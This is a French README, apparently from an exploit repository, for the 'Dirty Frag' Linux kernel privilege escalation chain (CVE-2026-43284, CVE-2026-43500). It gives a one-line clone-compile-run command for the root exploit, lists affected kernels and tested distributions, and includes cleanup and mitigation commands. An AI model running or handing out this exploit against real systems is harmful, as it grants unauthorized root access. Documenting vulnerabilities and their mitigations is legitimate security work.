
Chaîne d'exploitation du noyau Linux (CVE-2026-43284 et CVE-2026-43500) permettant d'obtenir les privilèges root via les vulnérabilités d'écriture dans le cache de pages xfrm-ESP et RxRPC.
Linux CVE-2026-43284 & CVE-2026-43500
Copié depuis @V4bel :) Merci :)
Ce document décrit la classe de vulnérabilité Dirty Frag, découverte et signalée pour la première fois par Hyunwoo Kim (@v4bel), qui permet d'obtenir les privilèges root sur les principales distributions Linux en enchaînant la vulnérabilité xfrm-ESP Page-Cache Write (CVE-2026-43284) et la vulnérabilité RxRPC Page-Cache Write (CVE-2026-43500).
Dirty Frag est un cas qui étend la classe de bugs à laquelle appartiennent Dirty Pipe et Copy Fail. Comme il s'agit d'un bug logique déterministe qui ne dépend pas d'une fenêtre temporelle, aucune condition de course n'est nécessaire, le noyau ne panique pas lorsque l'exploit échoue, et le taux de réussite est très élevé.
Pour des informations techniques détaillées et la chronologie, voir ici.
xfrm-ESP Page-Cache Write (CVE-2026-43284) a été corrigé dans le mainline f4c50a4034e6.
RxRPC Page-Cache Write (CVE-2026-43500) a été corrigé dans le mainline aa54b1d27fe0.
Exploitation : À exécuter uniquement dans le cadre de missions autorisées !!
Oneliner : git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Étape par étape :
compilez d'abord l'exploit, puis exécutez le binaire
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! Nettoyage
⚠️ Important : Après avoir exécuté cet exploit, le page cache est contaminé. Pour vider le page cache pollué et garantir la stabilité du système, exécutez soit :
echo 3 > /proc/sys/vm/drop_caches
soit redémarrez le système. Versions affectées
CVE-2026-43284 : la vulnérabilité xfrm-ESP Page-Cache Write est concernée depuis cac2661c53f3 (2017-01-17) jusqu'à f4c50a4034e6 (2026-05-05).
CVE-2026-43500 : la vulnérabilité RxRPC Page-Cache Write est concernée depuis 2dc334f1a63a (2023-06-08) jusqu'à aa54b1d27fe0 (2026-05-10).
En d'autres termes, la durée de vie effective des vulnérabilités est d'environ 9 ans.
Ce Dirty Frag a été testé sur les versions de distribution suivantes.
Ubuntu 24.04.4 : 6.17.0-23-generic
RHEL 10.1 : 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed : 7.0.2-1-default
CentOS Stream 10 : 6.12.0-224.el10.x86_64
AlmaLinux 10 : 6.12.0-124.52.3.el10_1.x86_64
Fedora 44 : 6.19.14-300.fc44.x86_64
...
Atténuation
Utilisez la commande suivante pour supprimer les modules dans lesquels les vulnérabilités se produisent et vider le page cache.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Une fois que chaque distribution aura rétroporté un correctif, mettez à jour en conséquence.